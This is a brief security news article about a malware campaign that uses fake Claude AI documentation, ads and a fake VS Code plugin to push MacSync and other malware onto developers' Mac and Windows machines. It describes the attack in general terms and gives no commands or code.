Mac Users Warned of ClickFix Attack via Fake Claude Tools Spreading MacSync Malware

Post Views: 3

Malicious Claude AI Campaign Targets Developers with MacSync Malware

A sophisticated phishing campaign, dubbed Claude Fraud, has been uncovered by cybersecurity researchers at 7AI. The attackers are leveraging the popularity of AI tools to trick developers into installing malware on their systems. This campaign is particularly noteworthy, as it has successfully compromised over 15,600 victims to date.

The Attack Vector

The attack begins with a Google search for a routine tool, such as a disk space checker or a HomeBrew command. The attackers have created fake websites that appear at the top of the search results, often hosted on legitimate platforms like claude.ai or Squarespace. These websites convincingly mimic official documentation, making it difficult for even tech-savvy professionals to distinguish them from legitimate sources.

Installing the Malware

Once a user visits one of these fake websites, they are instructed to copy a command into their Terminal to complete an installation. However, this command is actually a trap, known as a ClickFix, which installs a virus called MacSync on the user’s system. MacSync is a malicious tool that targets macOS Keychain credentials, including passwords, and wipes its own tracks after stealing browser cookies and crypto-wallet keys.

Windows Systems Also Targeted

The researchers noted that this campaign is not limited to Mac users. A second version of the attack targets Windows systems through VS Code, a popular app used by programmers. In this version, the attackers have created a fake Claude Code plugin that developers unknowingly install. This plugin runs in the background, allowing the attackers to execute a second-stage virus, such as a fake utility called CrossMark2, without detection.

Sophisticated Tactics

The attackers have also been found to have used stolen advertising accounts from a children’s charity in Canada and a retailer in Colombia to get their fake ads approved by Google. This level of sophistication highlights the importance of verifying the source of any AI tool before permitting it to run on a machine.

Conclusion

In light of this campaign, it is essential for developers to exercise extreme caution when searching for and installing software tools. Always double-check the source of an AI tool to avoid falling victim to this type of attack.